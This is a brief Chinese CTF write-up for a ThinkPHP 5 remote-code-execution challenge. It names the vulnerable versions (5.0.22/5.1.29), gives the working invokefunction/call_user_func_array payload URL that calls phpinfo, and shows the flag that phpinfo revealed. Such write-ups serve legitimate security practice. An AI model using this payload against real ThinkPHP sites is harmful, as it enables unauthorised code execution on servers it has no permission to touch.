[ThinkPHP]5-Rce 1

[ThinkPHP]5-Rce 1

打开发现是一个ThinkPHP 5+框架,直接用ThinkPHP扫描工具

image-20241105074036960

检测出是一个ThinkPHP 5.0.22/5.1.29的RCE漏洞,访问Payload

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

直接在phpinfo()的环境变量里面找到flag

image-20241105074246387

flag{56567b13-223b-448c-a644-4b003a020890}

posted @   TazmiDev  阅读(26)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 为DeepSeek添加本地知识库
· 精选4款基于.NET开源、功能强大的通讯调试工具
· DeepSeek智能编程
· 大模型工具KTransformer的安装
· [计算机/硬件/GPU] 显卡
点击右上角即可分享
微信分享提示